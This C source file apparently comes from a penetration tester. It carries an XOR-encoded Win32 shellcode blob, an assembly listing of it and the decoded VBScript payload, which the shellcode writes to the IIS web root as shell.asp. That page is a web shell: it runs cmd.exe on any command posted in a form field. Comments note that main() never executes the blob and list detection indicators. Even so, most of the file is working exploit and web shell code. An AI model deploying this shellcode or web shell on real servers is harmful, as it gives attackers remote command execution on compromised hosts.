// shellcode that creates shell.asp, a cmdasp.asp-like page
// handy for penetration tests where a vulnerable IIS server is
// heavily firewalled
//                                           <michael@scanit.be>

#include <windows.h>

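/*
 * Carrier for a 32-bit Win32 shellcode blob (the commented listing and the
 * decoded payload follow the byte string).  The blob is XOR-0x99 encoded;
 * once decoded it resolves CloseHandle, WriteFile and CreateFileA from
 * kernel32 by name and writes a VBScript command page to
 * c:\inetpub\wwwroot\shell.asp.
 *
 * main() only declares the buffer.  Nothing in this file executes, copies
 * or writes it, so building and running the program has no effect beyond
 * returning 0 (the explicit return also keeps pre-C99 compilers from
 * handing the host an indeterminate exit status).
 *
 * What an analyst can read directly off this file:
 *   - Both call targets are absolute addresses, embedded as 0x42413cff and
 *     0x424194ff and shifted right by 8 before the call (presumably to keep
 *     a NUL byte out of the encoded blob), so the blob is tied to one fixed
 *     image layout.
 *   - The decoder is a single-byte XOR with key 0x99 over 0x353 bytes;
 *     XOR-ing the tail of the literal with 0x99 recovers the import names,
 *     the target path and the ASP source reproduced below.
 *   - Host/web artifacts worth alerting on: a new shell.asp in the IIS web
 *     root, POST requests carrying a ".CMD" form field, and
 *     "cmd.exe /c <cmd> > C:\<tempname>" started through WSCRIPT.SHELL with
 *     the output read back via Scripting.FileSystemObject.
 *   - The hand-written listing is approximate and does not match the bytes
 *     one-to-one (e.g. its `inc esi` has no opcode in the blob); disassemble
 *     the byte string rather than trusting the listing.
 *
 * Returns 0.
 */
int main(void){

	/* Encoded blob, kept byte-for-byte: it is the artifact this file
	   documents.  Layout: self-locating (call/pop) decoder stub and API
	   resolution, 16 placeholder bytes that the stub overwrites with the
	   LoadLibrary result for kernel32 and the three resolved function
	   pointers, then the XOR-0x99 strings and ASP source. */
	char shellcode[] =

		"\xEB\x03\x5E\xEB\x05\xE8\xF8\xFF\xFF\xFF\x81\xEE\x10\xFC\xFF\xFF"
		"\x33\xC9\x66\xB9\x53\x03\x80\x36\x99\x4E\xE2\xFA\x8B\xFE\x83\xEF\x10\x56\xBB"

		// loadlib	0x42413cff
		"\xFF\x3C\x41\x42"

		"\xC1\xEB\x08\xFF\xD3\x89\x07\x83\xC6\x09\x56\x57\xBB"

		// getproc	0x424194ff
		"\xFF\x94\x41\x42"

		"\xC1\xEB\x08\xFF\xD3\x89\x47\x04"
		"\x83\xC6\x0C\x56\x57\xFF\xD3\x89\x47\x08\x83\xC6\x05\x83\xC6\x05"
		"\x56\x57\xFF\xD3\x89\x84\x2F\xF4\xFF\xFF\xFF\x83\xC6\x0C\x33\xC9"
		"\x51\xB1\x80\x51\x6A\x02\x33\xC9\x51\x51\xB9\xBF\xDD\xA5\xBE"
		"\x81\xF1\xBE\xBA\xDE\xC0\x51\x56\xFF\x94\x2F\xF4\xFF\xFF\xFF"
		"\x8B\xD0\x33\xC9\x51\x8D\x5E\xE8\x53\x66\xB9\x02\x03\x51\x83\xC6\x32"
		"\x56\x52\xFF\x57\x08\x52\xFF\x57\x04"
		"\xc0\xde\xba\xbe\xc0\xde\xba\xbe\xc0\xde\xba\xbe\xc0\xde\xba\xbe"
		"\xF2\xFC\xEB\xF7\xFC\xF5\xAA\xAB\x99"
		"\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xCE\xEB\xF0\xED\xFC\xDF"
		"\xF0\xF5\xFC\x99\xDA\xEB\xFC\xF8\xED\xFC\xDF\xF0\xF5\xFC\xD8\x99\xFA\xA3"
		"\xC5\xC5\xC5\xC5\xF0\xF7\xFC\xED\xE9\xEC\xFB\xC5\xC5\xC5\xC5\xEE\xEE\xEE"
		"\xEB\xF6\xF6\xED\xC5\xC5\xC5\xC5\xEA\xF1\xFC\xF5\xF5\xB7\xF8\xEA\xE9\x99"
		"\xA5\xBC\xD9\xB9\xD5\xF8\xF7\xFE\xEC\xF8\xFE\xFC\xA4\xCF\xDB\xCA\xFA\xEB"
		"\xF0\xE9\xED\xB9\xBC\xA7\x94\x93\xA5\xBC\x94\x93\xDD\xF0\xF4\xB9\xF6\xEA"
		"\xB5\xB9\xF6\xF7\xB5\xB9\xF6\xFF\xB5\xB9\xFF\xF0\xB5\xB9\xFA\xF4\xB5\xB9"
		"\xEA\xED\x94\x93\xD6\xF7\xB9\xDC\xEB\xEB\xF6\xEB\xB9\xCB\xFC\xEA\xEC\xF4"
		"\xFC\xB9\xD7\xFC\xE1\xED\x94\x93\xCA\xFC\xED\xB9\xF6\xEA\xB9\xA4\xB9\xCA"
		"\xFC\xEB\xEF\xFC\xEB\xB7\xDA\xEB\xFC\xF8\xED\xFC\xD6\xFB\xF3\xFC\xFA\xED"
		"\xB1\xBB\xCE\xCA\xDA\xCB\xD0\xC9\xCD\xB7\xCA\xD1\xDC\xD5\xD5\xBB\xB0\x94"
		"\x93\xCA\xFC\xED\xB9\xF6\xF7\xB9\xA4\xB9\xCA\xFC\xEB\xEF\xFC\xEB\xB7\xDA"
		"\xEB\xFC\xF8\xED\xFC\xD6\xFB\xF3\xFC\xFA\xED\xB1\xBB\xCE\xCA\xDA\xCB\xD0"
		"\xC9\xCD\xB7\xD7\xDC\xCD\xCE\xD6\xCB\xD2\xBB\xB0\x94\x93\xCA\xFC\xED\xB9"
		"\xF6\xFF\xB9\xA4\xB9\xCA\xFC\xEB\xEF\xFC\xEB\xB7\xDA\xEB\xFC\xF8\xED\xFC"
		"\xD6\xFB\xF3\xFC\xFA\xED\xB1\xBB\xCA\xFA\xEB\xF0\xE9\xED\xF0\xF7\xFE\xB7"
		"\xDF\xF0\xF5\xFC\xCA\xE0\xEA\xED\xFC\xF4\xD6\xFB\xF3\xFC\xFA\xED\xBB\xB0"
		"\x94\x93\xFA\xF4\xB9\xA4\xB9\xCB\xFC\xE8\xEC\xFC\xEA\xED\xB7\xDF\xF6\xEB"
		"\xF4\xB1\xBB\xB7\xDA\xD4\xDD\xBB\xB0\x94\x93\xD0\xFF\xB9\xB1\xFA\xF4\xB9"
		"\xA5\xA7\xB9\xBB\xBB\xB0\xB9\xCD\xF1\xFC\xF7\x94\x93\xEA\xED\xB9\xA4\xB9"
		"\xBB\xDA\xA3\xC5\xBB\xB9\xBF\xB9\xF6\xFF\xB7\xDE\xFC\xED\xCD\xFC\xF4\xE9"
		"\xD7\xF8\xF4\xFC\xB1\xB9\xB0\x94\x93\xDA\xF8\xF5\xF5\xB9\xF6\xEA\xB7\xCB"
		"\xEC\xF7\xB9\xB1\xBB\xFA\xF4\xFD\xB7\xFC\xE1\xFC\xB9\xB6\xFA\xB9\xBB\xB9"
		"\xBF\xB9\xFA\xF4\xB9\xBF\xB9\xBB\xB9\xA7\xB9\xBB\xB9\xBF\xB9\xEA\xED\xB5"
		"\xB9\xA9\xB5\xB9\xCD\xEB\xEC\xFC\xB0\x94\x93\xCA\xFC\xED\xB9\xFF\xF0\xB9"
		"\xA4\xB9\xF6\xFF\xB7\xD6\xE9\xFC\xF7\xCD\xFC\xE1\xED\xDF\xF0\xF5\xFC\xB9"
		"\xB1\xEA\xED\xB5\xB9\xA8\xB5\xB9\xDF\xF8\xF5\xEA\xFC\xB5\xB9\xA9\xB0\x94"
		"\x93\xDC\xF7\xFD\xB9\xD0\xFF\x94\x93\xBC\xA7\x94\x93\xA5\xD1\xCD\xD4\xD5"
		"\xA7\xA5\xDB\xD6\xDD\xC0\xA7\xA5\xDF\xD6\xCB\xD4\xB9\xF8\xFA\xED\xF0\xF6"
		"\xF7\xA4\xBB\xA5\xBC\xA4\xB9\xCB\xFC\xE8\xEC\xFC\xEA\xED\xB7\xCA\xFC\xEB"
		"\xEF\xFC\xEB\xCF\xF8\xEB\xF0\xF8\xFB\xF5\xFC\xEA\xB1\xBB\xCC\xCB\xD5\xBB"
		"\xB0\xB9\xBC\xA7\xBB\xB9\xF4\xFC\xED\xF1\xF6\xFD\xA4\xBB\xC9\xD6\xCA\xCD"
		"\xBB\xA7\xA5\xF0\xF7\xE9\xEC\xED\xB9\xED\xE0\xE9\xFC\xA4\xED\xFC\xE1\xED"
		"\xB9\xF7\xF8\xF4\xFC\xA4\xBB\xB7\xDA\xD4\xDD\xBB\xB9\xEA\xF0\xE3\xFC\xA4"
		"\xAD\xAC\xB9\xEF\xF8\xF5\xEC\xFC\xA4\xBB\xA5\xBC\xA4\xB9\xFA\xF4\xB9\xBC"
		"\xA7\xBB\xA7\xA5\xF0\xF7\xE9\xEC\xED\xB9\xED\xE0\xE9\xFC\xA4\xEA\xEC\xFB"
		"\xF4\xF0\xED\xB9\xEF\xF8\xF5\xEC\xFC\xA4\xBB\xCB\xEC\xF7\xBB\xA7\xA5\xB6"
		"\xDF\xD6\xCB\xD4\xA7\xA5\xC9\xCB\xDC\xA7\x94\x93\xA5\xBC\x94\x93\xD0\xFF"
		"\xB9\xB1\xD0\xEA\xD6\xFB\xF3\xFC\xFA\xED\xB1\xFF\xF0\xB0\xB0\xB9\xCD\xF1"
		"\xFC\xF7\x94\x93\xD6\xF7\xB9\xDC\xEB\xEB\xF6\xEB\xB9\xCB\xFC\xEA\xEC\xF4"
		"\xFC\xB9\xD7\xFC\xE1\xED\x94\x93\xCB\xFC\xEA\xE9\xF6\xF7\xEA\xFC\xB7\xCE"
		"\xEB\xF0\xED\xFC\xB9\xCA\xFC\xEB\xEF\xFC\xEB\xB7\xD1\xCD\xD4\xD5\xDC\xF7"
		"\xFA\xF6\xFD\xFC\xB1\xFF\xF0\xB7\xCB\xFC\xF8\xFD\xD8\xF5\xF5\xB0\x94\x93"
		"\xFF\xF0\xB7\xDA\xF5\xF6\xEA\xFC\x94\x93\xDA\xF8\xF5\xF5\xB9\xF6\xFF\xB7"
		"\xDD\xFC\xF5\xFC\xED\xFC\xDF\xF0\xF5\xFC\xB1\xEA\xED\xB5\xB9\xCD\xEB\xEC"
		"\xFC\xB0\x94\x93\xDC\xF7\xFD\xB9\xD0\xFF\x94\x93\xBC\xA7\x94\x93\xA5\xB6"
		"\xDB\xD6\xDD\xC0\xA7\xA5\xB6\xD1\xCD\xD4\xD5\xA7\x99\x99";

/*	Hand-written listing of the decoder/stub (approximate; see the note in the
	function header).  Labels: terug = "back", floep = "plop", verder = "on".

		jmp floep
terug:  pop esi
		jmp verder
floep:  call terug
verder: sub esi, 0xfffffc10	// i.e. esi += 0x3f0 (bytes 81 EE 10 FC FF FF); author's note: "or so"
		inc esi				// no matching opcode in the byte string above
		xor ecx,ecx
		mov cx, 0x353	// 0x353 = length of ASP code + filename + function names + lib name
decr:	xor byte ptr [esi], 0x99
		dec esi
		loop decr
  // data is decoded now, esi at beginning of "kernel32\0"
		mov edi, esi
		sub edi, 0x10
  // edi now at beginning of the 16-byte placeholder slot (AAAABBBBCCCCDDDD)
		push esi			// kernel32
		mov ebx, LOADLIB
		shr ebx, 0x8		// LOADLIB is stored <<8 so the constant carries no NUL byte
		call ebx
		mov dword ptr[edi], eax	// store LoadLibrary result for kernel32  (@AAAA)
		add esi, 0x9
		push esi
		push edi
		mov ebx, GETPROC
		shr ebx, 0x8
		call ebx
		mov dword ptr [edi+4], eax	// CloseHandle (BBBB)
		add esi, 0xc
		push esi
		push edi
		call ebx
		mov dword ptr [edi+8], eax	// WriteFile (CCCC)
		add esi, 0x5
		add esi, 0x5				// split so no 0x0a ("\n") byte appears in the blob
		push esi
		push edi
		call ebx
		mov dword ptr [edi+0xc], eax	// CreateFileA (DDDD)
		add esi, 0xc	// beginning of filename

  // hFile =CreateFile("c:\\inetpub\\wwwroot\\shell.asp",FILE_ALL_ACCESS,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

		xor ecx,ecx
		push ecx				// hTemplateFile = NULL
		mov cl, 0x80
		push ecx				// FILE_ATTRIBUTE_NORMAL
		push 0x2				// CREATE_ALWAYS
		xor ecx,ecx
		push ecx				// lpSecurityAttributes = NULL
		push ecx				// dwShareMode = 0
		mov ecx, 0xbea5ddbf
		xor ecx, 0xc0debabe	// constant is split so the access mask's NUL byte is not in the blob
		push ecx				// FILE_ALL_ACCESS = 0x1F03FF
		push esi				// filename
		call dword ptr [edi+0xc]

	// WriteFile(hFile, buf, 770, &tmp, NULL);

  		mov edx, eax
		xor ecx, ecx
		push ecx
		lea  ebx, [esi-24]	// "kern" from kernel32\0 is reused as the lpNumberOfBytesWritten slot
		push ebx
		mov cx, 0x302		// 0x302 = 770 bytes of ASP source
		push ecx
		add esi, 0x32		// point to the decoded asp code
		push esi
		push edx
		call dword ptr [edi+8]

	// CloseHandle(hFile);

		push edx
		call dword ptr [edi+4]

// decoded view of the payload (the literal above holds it XOR-ed with 0x99):

//"AAAABBBBCCCCDDDD"
//"kernel32\x00"
//"CloseHandle\x00"
//"WriteFile\x00"
//"CreateFileA\x00"
//"c:\\\\inetpub\\\\wwwroot\\\\shell.asp\x00"
"<%@ Language=VBScript %>\r\n"
"<%\r\n"
"Dim os, on, of, fi, cm, st\r\n"
"On Error Resume Next\r\n"
"Set os = Server.CreateObject(\"WSCRIPT.SHELL\")\r\n"
"Set on = Server.CreateObject(\"WSCRIPT.NETWORK\")\r\n"
"Set of = Server.CreateObject(\"Scripting.FileSystemObject\")\r\n"
"cm = Request.Form(\".CMD\")\r\n"
"If (cm <> \"\") Then\r\n"
"st = \"C:\\\" & of.GetTempName( )\r\n"
"Call os.Run (\"cmd.exe /c \" & cm & \" > \" & st, 0, True)\r\n"
"Set fi = of.OpenTextFile (st, 1, False, 0)\r\n"
"End If\r\n"
"%>\r\n"
"<HTML><BODY><FORM action=\"<%= Request.ServerVariables(\"URL\") %>\" method=\"POST\"><input type=text name=\".CMD\" size=45 value=\"<%= cm %>\"><input type=submit value=\"Run\"></FORM><PRE>\r\n"
"<%\r\n"
"If (IsObject(fi)) Then\r\n"
"On Error Resume Next\r\n"
"Response.Write Server.HTMLEncode(fi.ReadAll)\r\n"
"fi.Close\r\n"
"Call of.DeleteFile(st, True)\r\n"
"End If\r\n"
"%>\r\n"
"</BODY></HTML>\x00";
*/

	(void)shellcode;	/* declared for documentation only; never executed or copied */
	return 0;
}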

